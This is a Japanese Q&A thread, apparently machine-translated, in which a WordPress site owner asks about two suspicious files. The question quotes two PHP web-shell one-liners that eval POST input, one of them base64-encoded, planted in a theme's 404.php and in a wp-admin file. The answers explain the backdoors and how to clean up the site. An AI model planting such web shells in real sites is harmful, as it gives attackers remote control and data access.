web-dev-qa-db-ja.com

疑わしいファイル

こんにちは私は私のサイトで2つの不審なファイルを見つけました:

  1. この行を追加した、私のテーマの最初の部分(404.php

    <?php if ($_POST["php"]){eval(base64_decode($_POST["php"]));exit;} ?>

  2. /wp-admin/の2番目はwp-class.phpと呼ばれます。

    唯一の行がありました:<?eval($_POST[joao]);?>

誰が私にこれが何をしているのか、そして私はどのようなステップを踏むべきかを教えてもらえますか?

securityhacked
1
qaedus

  1. 誰かが変数phpとそれをデコードした後のPOSTコードであるbase 64でエンコードされた値でPHPリクエストを送信すると、そのPHPコードはパーミッションで実行されます。あなた自身のPHPファイルのうちの1つ。攻撃者はすべてのデータベースコンテンツを読み取り、新しいユーザーを作成し、ファイルをアップロードすることができます。

  2. 2番目のコードも、PHPをエンコードすることなく、同じことを行います。

どちらの注射もかなり原始的です。それらはあなたがそれらを削除するときあなたが安全に感じるようにするために/が見つかるはずであるかのようにほとんど見えます。

これらのスニペットが唯一の問題ではない可能性が非常に高いです。攻撃者はおそらく彼の新しいサイトを使用し、いくつかのファイルを追加しました。 WordPressのハックを完全に削除したことの確認 を読んで、そこに記載されているすべての提案に従ってください。

裏口を見つけます。まだ危険にさらされていない場合は、ログファイルを読んでください。

3
fuxia

これらのコード行はほぼ確実に悪意のあるものです。ウェブマスターが文字列を検索する機能を妨げるために、悪意のあるコンテンツはbase64のようにエンコードされた形式で隠されていることがよくあります。

私の経験では、この攻撃の最も一般的なバージョンは、外部の悪意のあるURLをロードする隠されたiframeを出力します(これはさまざまな目的で使用される可能性があります)。

Quttera(内部)Sucuri(外部) と攻撃のすべてのインスタンスを識別して削除できるかどうかを確認してください。

0
Orun